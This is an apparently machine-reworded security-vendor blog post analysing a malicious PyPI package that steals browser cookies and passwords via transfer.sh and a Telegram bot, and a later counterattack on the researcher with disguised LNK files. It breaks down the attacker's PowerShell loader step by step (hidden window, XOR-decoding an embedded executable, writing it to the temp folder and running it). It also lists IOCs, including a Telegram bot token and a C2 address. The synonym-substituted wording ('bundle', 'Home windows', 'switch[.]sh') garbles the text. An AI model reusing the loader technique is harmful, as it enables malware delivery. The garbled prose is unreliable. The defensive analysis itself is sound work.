A cybersecurity researcher, delving into the depths of a malicious Python bundle, all of a sudden finds themselves within the crosshairs of the very hacker they have been monitoring. What begins as a pursuit of understanding dangerous code evolves right into a strategic battle of wits, the place each transfer may both outsmart the attacker or fall into their lure.
Introduction
Focusing on the open-source area within the software program business is trending amongst risk actors, not solely as a result of it represents one of many largest assault surfaces, however as a result of it usually escapes the vigilant eyes of organizations.
Open-source bundle managers are particularly attractive to Superior Persistent Threats (APTs) and different malicious entities who usually poison them with malicious packages and implement methods starting from manipulating construct automation processes to skillfully deceiving builders into putting in these compromised packages.
The ramifications of such breaches are far-reaching and might have devastating penalties for any group, no matter its dimension. Due to this fact, it’s important to completely vet each element or dependency within the provide chain
Our analysis group acknowledges the seriousness of those threats. To safeguard the open-source software program ecosystem, we monitor fashionable public repositories like NPM and PyPi, simply to call just a few, to establish and remove any rogue packages or dependencies on the earliest stage.
This story, nevertheless, takes an surprising twist. when certainly one of our researchers, whereas analyzing a malicious Python bundle named “testfiwldsd21233s” from the PyPi repository, discovered themselves within the crosshairs of the very risk actor they have been investigating. What unfolded was not simply an evaluation of a cybersecurity breach, however a gripping story of how the hunter turned the hunted.
However earlier than we delve deep into the evaluation of this incident, let’s take a step again to grasp the background of the malicious bundle the researcher had been analyzing.
Behavioral Evaluation of Malicious Bundlea
In its entirety, the bundle is able to focusing on each Home windows and Linux-based techniques. If it detects that it’s on a Home windows NT host, it deploys a malicious executable. However, whether it is on a Linux-based host, it leverages native Python code. In essence, it functioned as a data-stealing malware, systematically gathering delicate data from internet browsers, together with however not restricted to cookies and saved passwords, and saved this information into non permanent recordsdata, which have been then uploaded to switch[.]sh. Lastly, it could exfiltrate the host data together with a singular URL to obtain the stolen information from switch[.]sh utilizing a hardcoded Telegram bot API URL. Moreover, it could create a scheduled job on the system to take care of persistence.
Pushed by curiosity, the researcher needed to look at the exfiltrated information and analyze it. The target was to evaluate the scope of the malware’s affect, establish and find potential victims, and discover the opportunity of tracing the risk actor behind it.
A Sport of Cyber Cat & Mouse: The Researcher’s Countermove
By using a way that permits the forwarding of all exfiltrated information by the Telegram bot API to the researcher’s private Telegram chat, the researcher successfully managed to redirect all of the stolen information from the risk actor’s chat to their very own chat.
Forwarding of information from the risk actor’s Telegram chat to the researcher’s personal chat
The info forwarded by the bot included numerous host data, geo-location, and the hyperlink to obtain an encrypted file with a “.wsr” extension, which incorporates all of the stolen cookies and passwords. Sadly, the recordsdata couldn’t be decrypted for additional evaluation, and that is the place we stopped our investigation.
The Attacker Makes an attempt To Strike Again
Nonetheless, after roughly a month, the researcher acquired a brand new notification a few new stolen document within the chat from the identical Telegram bot.
This raised suspicion as a result of, in contrast to earlier information, there was no “forwarded” tag hooked up to the brand new chat. And as an alternative of an encrypted file with a “.wsr” extension, there was an unencrypted zip archive.
Suspicious message acquired in telegram chat
Upon downloading and decompressing the zip archive hooked up to the chat for additional evaluation, the next observations have been made:
the unarchived information contained a number of recordsdata with the “.lnk” extension, which in all of the circumstances aside from one, have been additionally preceded by a second extension within the filename, which was “.txt”.
The presence of those double extensions raised suspicion, significantly the “.lnk” extension, as LNK recordsdata are recognized to be shortcut recordsdata within the Home windows OS that may probably execute malicious code if clicked.
The listing of recordsdata with the “.lnk” extension, preceded by the txt extension
Peeling Again Layers: Exposing a Backdoor Operation
Upon analyzing these shortcut recordsdata utilizing the “exiftool” command on a Linux machine, we found a number of vital particulars.
First, the “Icon File Name” property was set to the trail “%windir%system32notepad.exe”, which brought about the shortcut recordsdata to show the notepad icon. Using the “.txt” extension within the filename now is sensible since MS Home windows doesn’t present the precise file extension within the explorer, and mixed with the customized icon set for these subjected recordsdata, they seem like regular – benign textual content recordsdata.
The second factor we realized was that the “Command Line Arguments” property was set to the next powershell command:
One other factor to notice is that each one the shortcut recordsdata within the unarchived information aside from the “Screen,jpg.lnk” had the very same SHA-256 hash. they’re, due to this fact, all the identical malicious recordsdata. If any certainly one of these recordsdata is opened, then the above malicious PowerShell command outlined within the “Command Line Arguments” property will likely be executed.
Here’s a breakdown of the PowerShell command and its execution:
- “/c powershell -windowstyle hidden”: The whole command will likely be executed in a hidden window and won’t be seen to the sufferer.
- “$lnkpath = Get-ChildItem .lnk ^| where-object {$_.length -eq 0x00117926} ^| Select-Object -ExpandProperty Name;”: Searches for a shortcut file (.lnk) within the present listing with a file dimension of 0x00117926 (in hex), this can end in any of the malicious shortcut recordsdata aside from “Screen,jpg.lnk”, as they fulfill the file dimension standards.
- “$file = gc $lnkpath -Encoding Byte”: The content material of the file matching the standards is then learn and saved within the type of a byte array within the variable – “$file”.
- “for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x33 };”: Iterating over every byte saved within the byte array – “$file”, a bitwise XOR operation with the worth 0x33 on every byte of the byte array.
- “$path=”%temp%tmp” + (Get-Random) + ‘.exe’;”: Creates a brand new executable file within the non permanent listing with a random title and “.exe” as its extension by skipping the primary “2838” bytes of the beforehand modified byte array.
- “sc $path ([byte []] ($file ^| select -Skip 002838)) -Encoding Byte;”: Writes the XOR-ed byte array after skipping the primary “2838” bytes, to the brand new “.exe” file.
- ^& $path;”: Lastly, runs the newly created executable.
We then used a easy Python script as proven within the photograph beneath, to extract the malicious executable from the “LNK” file. Moreover, the “file” command confirms that the extracted file is a 64-bit PE file for MS Home windows, written in .NET framework, with the SHA-256 hash of “4cf48c2a3933ac4c6733533bf16d40fa4e411fbbf42b03d84d6c8df62e253ad0”.
In terms of the malicious executable, one choice is to statically analyze it by decompiling it utilizing a .NET Decompiler like ILSpy or dnSpy. Nonetheless, on this explicit case, we opted for dynamic evaluation because it proved to be extra environment friendly. Via this evaluation, we made the next observations:
This malicious executable has been recognized as a backdoor created utilizing the Metasploit framework. It communicates with a handler on the IP tackle “128[.]199[.]113[.]162”. The whole URL that the backdoor makes use of, accepting each GET and POST requests, is “hxxp[://]128[.]199[.]113[.]162/upwawsfrg[.]php”. This endpoint can be utilized for exfiltrating information in addition to fetching different payloads for post-exploitation functions.
Moreover, the processes invoked by the executable point out that it additionally makes use of the Home windows job scheduler to create a scheduled job on the compromised host. This job executes the executable itself each 5 minutes, serving as a persistence mechanism that permits the risk actor to take care of constant distant entry even after reboots.
Conclusion
From the above incident, it’s clear that it was a fastidiously crafted assault, tailor-made with meticulous consideration to element. The risk actor behind this assault demonstrated a transparent understanding of the context and scenario. Using pretend Exil information was a formidable tactic, because it may have deceived the researcher into making a misstep leading to a whole compromise.
In gentle of this, people working within the cybersecurity business have to be extra vigilant. Assaults have gotten more and more refined daily, and they don’t seem to be restricted to the common web surfer.
As a part of the Checkmarx Provide Chain Safety resolution, our analysis group constantly screens suspicious actions within the open-source software program ecosystem. We monitor and flag “signals” which will point out foul play and promptly alert our clients to assist defend them.
IOC
- hxxps[://]api[.]telegram[.]org/bot6021370805:AAFbCSlFairNgnxSj8mC6Wtf7PW5yGyWmcE
- 128[.]199[.]113[.]162
- hxxp[://]128[.]199[.]113[.]162/upwawsfrg[.]php
- SHA-256 hash of LNK recordsdata – 273a75ba90251e317ed6291e6d4e31f80ce006e81bdc6582a4988078dc5610ef
- SHA256 hash of malicious executable – “4cf48c2a3933ac4c6733533bf16d40fa4e411fbbf42b03d84d6c8df62e253ad0”
